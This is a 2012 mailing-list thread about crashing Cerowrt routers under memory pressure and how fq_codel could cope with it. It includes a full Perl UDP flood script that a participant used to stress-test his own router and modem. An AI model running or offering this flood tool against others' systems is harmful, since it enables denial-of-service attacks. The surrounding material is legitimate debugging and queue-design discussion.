[Cerowrt-devel] Coping with router memory limitations in fq_codel

Mon Aug 20 15:55:26 EDT 2012

Hi Dave,

sorry for accidentally taking this private, so here it is again.

On Aug 20, 2012, at 12:41 PM, Sebastian Moeller wrote:

> Hi Dave,
> 
> thanks for the long and thoughtful response.
> 
> 
> On Aug 20, 2012, at 12:12 PM, Dave Taht wrote:
> 
>> Dear Sebastian:
>> 
>> In addition to your udp flooding DoS attack, I attacked cero also by
>> using diffserv marking in netperf (-Y codepoint,codepoint) to saturate
>> all 4 wifi fq_codel queues, and also would get the router to have
>> memory allocation failures and ultimately crash in the same way you
>> are crashing it. I can similarly do what you just did with rtp
>> flooding. You are correct that codel is tuned for tcp, and that
>> fq_codel by maintaining many queues is even more susceptible to a
>> tuned udp flooding attack on a memory limited device such as this.
> 
> 	Ah, I did not think that I was reporting anything new with regard to crashing the router; it was more about having found a way to reproduce it without netperf/iperf (which I never really got to run, for lack of endpoints) and without using http://broadband.mpi-sws.org/residential/ (which only allows around 5 runs per 24-hour period).
> 
>> 
>> I tried to cope with this in 3.3.8-10/11 by reducing the packet
>> limits, which helped a lot. Unfortunately the settings I used then
>> were below codel's reaction time, which invoked "interesting" tail
>> drop behavior, so I arbitrarily doubled them in -17. To invoke more of
>> the kind of problems you are encountering…
> 
> 	That would be limit 600? Is 600 a problem for a single flow, or is it due to the limit applying to the sum of all flows? Would an additional per-flow limit help deal with this issue?
> 
>> 
>> 0) Since then I have been looking into ways to improve codel's
>> reaction time that are in the ns2 model presently, also fixing an
>> assumption about newton's method that didn't hold in reverse, and also
>> means to incorporate more aggressive codel behavior when queue limits
>> are near to being exceeded.
> 
> 	I see ramping up the drop frequency once space gets tight...
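
To make the "ramping up" idea concrete, here is a minimal Python sketch. The first function is CoDel's control law, in which the gap to the next drop shrinks as interval/sqrt(count), with the usual 100 ms default interval. The second function, `pressure_scaled_interval`, together with its `threshold` parameter and the 0.25 floor, is purely hypothetical: it is not taken from the Linux or ns2 code and only illustrates one way the drop schedule could be tightened as the backlog nears the packet limit.

```python
import math

INTERVAL_MS = 100.0  # CoDel's default interval


def next_drop_gap_ms(count, interval_ms=INTERVAL_MS):
    """CoDel control law: the gap to the next drop shrinks as 1/sqrt(count)."""
    return interval_ms / math.sqrt(count)


def pressure_scaled_interval(backlog, limit, interval_ms=INTERVAL_MS,
                             threshold=0.75):
    """HYPOTHETICAL: shrink the interval once the queue is nearly full.

    Below `threshold` * limit the interval is unchanged. Above it, the
    interval ramps down linearly to a quarter of its value at a full queue.
    """
    fill = backlog / limit
    if fill <= threshold:
        return interval_ms
    headroom = max(0.0, (1.0 - fill) / (1.0 - threshold))
    return interval_ms * (0.25 + 0.75 * headroom)


if __name__ == "__main__":
    for backlog in (300, 900, 1050, 1200):
        interval = pressure_scaled_interval(backlog, limit=1200)
        gap = next_drop_gap_ms(4, interval)
        print(f"backlog {backlog:4d}: interval {interval:6.1f} ms, "
              f"gap after 4 drops {gap:5.1f} ms")
```

Whether a linear ramp is a sensible shape is an open question; the point is only that the limit check and the drop scheduler would have to share state, which they currently do not.
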
> 
>> 
>> Unfortunately as the memory pressure problem starts in the driver,
>> it's not communicated up the stack to where it could be controlled
>> better…
> 
> 	Argh, sounds like fun :)
> 
>> 
>> 0) I would like to avoid having to determine if a queue is tcp or
>> "other", and then having different kinds of drop strategies for each.
>> That said, it seems possible to implement that…
> 
> 	Since the flows are filled by hash, a flow might contain both, correct? So being firmer with flows that contain non-TCP traffic might hurt some TCP flows in shared bins.
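
A rough way to gauge how often that sharing happens is sketched below in Python. It assumes an idealized, uniform hash and 1024 bins (fq_codel's default number of flows; the value configured on a given cerowrt build may differ). The function name is made up for this illustration.

```python
def shared_bin_probability(other_flows, bins=1024):
    """Chance that one given flow shares its bin with at least one of
    `other_flows` other flows, assuming a uniform hash (an idealization)."""
    return 1.0 - (1.0 - 1.0 / bins) ** other_flows


if __name__ == "__main__":
    for n in (1, 10, 100, 1000):
        print(f"{n:5d} other flows: {shared_bin_probability(n):.3f}")
```

With only a handful of active flows, sharing is rare, but a flood that uses random ports creates many flows and makes it likely that a given TCP flow ends up in a bin alongside flood traffic.
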
> 
>> 
>> 1) A workaround of sorts for the 64MB 3700v2 has been to give up on
>> named and get some memory back that way.
> 
> 	Since I am a layman, what is the quick and dirty (and reversible) way to do so, so I can test this?
> 
>> 
>> 2) I believe, but am not sure, that Linux 3.6(5?) has some stuff in it
>> to get skb memory allocations done more efficiently. Eric and I and
>> felix had talked about it, I don't know what was implemented.
> 
> 	ISTR there was something about fixing the accounting of drivers so they track all buffers and not just part of the payload (truesize was the word). Which totally went over my head, but sounds like something that might help...
> 
>> 
>> 3) It may be possible to improve how the memory allocations from the
>> 2048 slab work in general. I imagine that half of memory is being
>> wasted on big packets otherwise.
> 
> 	I had a quick look at the SLUB documentation and see no way to do so that I can understand.
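
For a sense of scale, the following Python sketch does the worst-case arithmetic. It assumes power-of-two size classes, which simplifies how kmalloc-style caches work, and it counts only the data buffer, not the sk_buff structure itself. The 1926-byte request comes from the ath error message in this thread; 600 and 1200 are the limits discussed here, and 10240 is fq_codel's default packet limit (the "10k" mentioned in the thread). The function names are illustrative only.

```python
def slab_size(request_bytes, min_size=32):
    """Round a request up to the next power of two (simplified size classes)."""
    size = min_size
    while size < request_bytes:
        size *= 2
    return size


def worst_case_queue_bytes(packet_limit, alloc_bytes):
    """Bytes pinned if every queued packet occupies one slab object."""
    return packet_limit * slab_size(alloc_bytes)


if __name__ == "__main__":
    print("1926-byte request lands in a", slab_size(1926), "byte object")
    for limit in (600, 1200, 10240):
        mib = worst_case_queue_bytes(limit, 1926) / 2**20
        print(f"limit {limit:5d}: {mib:5.1f} MiB per qdisc")
```

Under these assumptions, a single qdisc at limit 1200 can pin about 2.3 MiB, and four such queues on wifi a bit over 9 MiB, which is a large share of what a 64MB router has free. A request just over 1024 bytes would waste nearly half of its 2048-byte object, whereas the 1926-byte request wastes only 122 bytes.
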
> 
>> 
>> 4) some options for improving fq_codel for more memory constrained
>> home environments.
>> 
>> 4a) On the wifi front (as well as other devices with multiple hardware
>> queues), I envision something like "mfq_codel", which would have an
>> overall similar packet limit to a single fq_codel, but be able to
>> deliver (and fair queue) packets to the underlying hardware queues
>> independently.
> 
> 	Sounds like something to test I guess (but out of my league)
> 
>> 
>> 4b) On the home to-ISP gateway qos front, a rate limited (tbf)
>> mfq_codel with 2-4 queues would replace the complexity of hfsc or htb
>> with a default qdisc that "just worked" without any scripting. It
>> could be mildly more responsive (htb buffers up some data and has its
>> own notion of time and quantums), thus cpu and memory usage would be
>> lower than htb + multiple fq_codel queues.
> 
> 	But I thought that being able to arbitrarily prioritize some traffic in a home router is a good thing; and that will require some hierarchical system and will bring along some complexity...
> 
> 
>> 
>> Getting something that scaled down to 10s of kbits and up to gigabits
>> would be hard, tho. HTB needs to be tuned when running lower or higher
>> than its original operating range, presently, and that is where, in
>> part, the simple_qos.sh effort is "stuck".
> 
> 	Can't this be divined from the configured up and downlink rates? Or are you thinking about dynamic changes in link-rates?
> 
>> 
>> 4c) Another thought would be to have a weighted packet (to handle
>> classification) oriented sfq codel or qfq_codel rather than separate
>> fq_codel queues that are each byte-aware... we have CPU to burn, but
>> not memory…
> 
> 	That I admit I do not understand.
> 
> Thanks a lot & best regards
> 	Sebastian
> 
>> 
>> On Mon, Aug 20, 2012 at 11:24 AM, Sebastian Moeller <moeller0 at gmx.de> wrote:
>>> Hi Dave,
>>> 
>>> so I went to play around with this a bit more. I turned to UDP flooding my cable modem through the router, and this surely allows me to create enough load on the wndr3700v2 to cause the allocation errors and, as a "bonus", also to drive the router to reboot (driven by the watchdog timer?). Here is the script I used over 5GHz wireless (from http://blog.ioshints.info/2008/03/udp-flood-in-perl.html)
>>> 
>>> #!/usr/bin/perl
>> 
>> It would be nice to have a C or lua version of this sort of test.
>> 
>>> ##############
>>> 
>>> # udp flood.
>>> ##############
>>> 
>>> use Socket;
>>> use strict;
>>> 
>>> if ($#ARGV != 3) {
>>> print "flood.pl <ip> <port> <size> <time>\n\n";
>>> print " port=0: use random ports\n";
>>> print " size=0: use random size between 64 and 1024\n";
>>> print " time=0: continuous flood\n";
>>> exit(1);
>>> }
>>> 
>>> my ($ip,$port,$size,$time) = @ARGV;
>>> 
>>> my ($iaddr,$endtime,$psize,$pport);
>>> 
>>> $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
>>> $endtime = time() + ($time ? $time : 1000000);
>>> 
>>> socket(flood, PF_INET, SOCK_DGRAM, 17);
>>> 
>>> 
>>> print "Flooding $ip " . ($port ? $port : "random") . " port with " .
>>> ($size ? "$size-byte" : "random size") . " packets" .
>>> ($time ? " for $time seconds" : "") . "\n";
>>> print "Break with Ctrl-C\n" unless $time;
>>> 
>>> for (;time() <= $endtime;) {
>>> $psize = $size ? $size : int(rand(1024-64)+64) ;
>>> $pport = $port ? $port : int(rand(65500))+1;
>>> 
>>> send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
>>> 
>>> called as either
>>> udp_flood.pl 192.168.100.1 0 1024 240
>>> or
>>> udp_flood.pl 192.168.100.1 32000 1024 240
>>> 
>>> The first version with randomized port number spreads the load nicely over many fq_codel bins/flows and seems slightly more likely to cause allocation errors and reboots than the 2nd invocation which restricts itself to port 32000 and presumably just one flow.
>>>       I wonder how to make cerowrt survive this kind of stress test…
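
The difference between the two invocations can be illustrated offline with a small Python sketch, without sending any traffic. It maps each destination port to one of 1024 bins using SHA-256 as a stand-in for the kernel's flow hash, which is an assumption, as are the source address and source port. The destination address and the 1..65500 port range follow the script above.

```python
import hashlib
import random

BINS = 1024  # fq_codel's default number of flows


def bin_for(src_ip, dst_ip, src_port, dst_port, proto=17):
    """Map a 5-tuple to a bin. SHA-256 is only a stand-in for the kernel hash."""
    key = f"{src_ip}|{dst_ip}|{src_port}|{dst_port}|{proto}".encode()
    return int.from_bytes(hashlib.sha256(key).digest()[:4], "big") % BINS


def bins_touched(dst_ports, src_ip="192.168.1.10", dst_ip="192.168.100.1",
                 src_port=40000):
    """Count the distinct bins hit by packets sent to `dst_ports`.

    The source address and port are hypothetical placeholders.
    """
    return len({bin_for(src_ip, dst_ip, src_port, p) for p in dst_ports})


rng = random.Random(0)
random_ports = [rng.randint(1, 65500) for _ in range(10000)]
fixed_ports = [32000] * 10000

if __name__ == "__main__":
    print("random ports:", bins_touched(random_ports), "bins")
    print("fixed port:  ", bins_touched(fixed_ports), "bin")
```

The fixed-port case always lands in a single bin, while random ports should touch nearly all of them, so every bin can hold a backlog at once and the shared packet limit becomes the only bound on memory use.
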
>>> 
>>> best
>>>       Sebastian
>>> 
>>> 
>>> On Aug 15, 2012, at 9:08 PM, Dave Taht wrote:
>>> 
>>>> re: ath: skbuff alloc of size 1926 failed
>>>> 
>>>> as for the ath skbuff problem, I've seen that a lot. I had put hard
>>>> packet limits (~600) on fq_codel in -11 and prior that were too low
>>>> and it mostly went away, but I hit tail drop behavior everywhere,
>>>> instead of codel behavior. What I have now (typically 1200) may well
>>>> be too high, but not as overly high as the default (10k packets).
>>>> There may be another means of increasing the size of that slab pool or
>>>> making it less onerous.
>>>> 
>>>> I would like it if codel "kicked in" earlier than it currently does.
>>>> The code in ns2 is currently using half the period that the linux code
>>>> is. This would control things better, or so I hope (planning on trying
>>>> this as I get time)
>>>> 
>>>> I am also considering means of artificially upscaling the drop
>>>> scheduler when we get close to queue limits.
>>>> 
>>>> See some discussions on the codel list for these issues. (sims are
>>>> easier to deal with than cerowrt, too!)
>>>> 
>>>> as for bind, it should be automagically restarted from xinetd, no need
>>>> to fiddle with anything. However, since you are already under massive
>>>> memory pressure, it may well fail to start up that way, too. At the
>>>> moment, I've largely given up on bind on anything but a more core home
>>>> gw, and am running dnsmasq on everything (3700v2, picostations,
>>>> nanostations) but the 3800s. (and the ones I run it on, aren't being
>>>> used for wifi right now).
>>>> 
>>>> Lastly: Swap space won't help you on exhausting kernel limits.
>>>> 
>>>> I'm glad you can reproduce the ath: slab problem - I can get it too at
>>>> high rates using netperf over wifi. I will try a 3700v2 with and
>>>> without bind to see if it's still there in 3.3.8-17. In the meantime
>>>> if anyone knows how to get more allocations in that (2048? 4096?) slab
>>>> by default, perhaps that will help?
>>>> 
>>>> 
>>>> 
>>>> On Wed, Aug 15, 2012 at 10:23 AM, Sebastian Moeller <moeller0 at gmx.de> wrote:
>>>>> Hi Dave,
>>>>> 
>>>>> great work, as always. I upgraded my production router to the latest and greatest (since I only have one router…). And it works quite well for normal usage…
>>>>> Netalyzr reports around 2800 ms of uplink buffering, yet saturating the uplink does not noticeably affect ping times to a remote target, basically the same as for all codelized cero versions I tested so far...
>>>>> 
>>>>> Some notes and a question:
>>>>> I noticed that even given plenty of swap space (1GB on a usb stick), using http://broadband.mpi-sws.org/residential/ to exercise UDP stress (on the uplink I assume) I can easily produce (I run the test from a macosx via 5GHz wireless over 1.5 yards):
>>>>> Aug 15 01:16:29 nacktmulle kern.err kernel: [175395.132812] ath: skbuff alloc of size 1926 failed
>>>>> (and plenty of those…).
>>>>> What then happens is that the OOM killer will aim for bind (reasonable since it is the largest single process) and kill it. When I try to restart bind by:
>>>>> root at nacktmulle:~# /etc/rc.d/S47namedprep start
>>>>> root at nacktmulle:~# /etc/rc.d/S48named restart
>>>>> Stopping isc-bind
>>>>> /etc/chroot/named//var/run/named/named.pid not found, trying brute force
>>>>> killall: named: no process killed
>>>>> Kicking isc-bind in xinetd
>>>>> rndc: connect failed: 127.0.0.1#953: connection refused
>>>>> And bind does not start again and the router becomes less than useful. I assume I am doing something wrong, but what? If you have any idea how to solve this short of rebooting the router (my current method), I would be happy to learn.
>>>>> 
>>>>> 
>>>>> 
>>>>> best regards
>>>>>      sebastian
>>>>> 
>>>>> On Aug 12, 2012, at 11:08 PM, Dave Taht wrote:
>>>>> 
>>>>>> I'm too tired to write up a full set of release notes, but I've been
>>>>>> testing it all day,
>>>>>> and it looks better than -10 and certainly better than -11, but I won't know
>>>>>> until some more folk sit down and test it, so here it is.
>>>>>> 
>>>>>> http://huchra.bufferbloat.net/~cero1/3.3/3.3.8-17/
>>>>>> 
>>>>>> fresh merge with openwrt, fix to a bind CVE, fixes for 6in4 and quagga
>>>>>> routing problems,
>>>>>> and a few tweaks to fq_codel setup that might make voip better.
>>>>>> 
>>>>>> Go forth and break things!
>>>>>> 
>>>>>> In other news:
>>>>>> 
>>>>>> Van Jacobson gave a great talk about bufferbloat, BQL, codel, and fq_codel
>>>>>> at last week's ietf meeting. Well worth watching. At the end he outlines
>>>>>> the deployment problems in particular.
>>>>>> 
>>>>>> http://recordings.conf.meetecho.com/Recordings/watch.jsp?recording=IETF84_TSVAREA&chapter=part_3
>>>>>> 
>>>>>> Far more interesting than this email!
>>>>>> 
>>>>>> 
>>>>>> --
>>>>>> Dave Täht
>>>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>>>>>> with fq_codel!"
>>>>>> _______________________________________________
>>>>>> Cerowrt-devel mailing list
>>>>>> Cerowrt-devel at lists.bufferbloat.net
>>>>>> https://lists.bufferbloat.net/listinfo/cerowrt-devel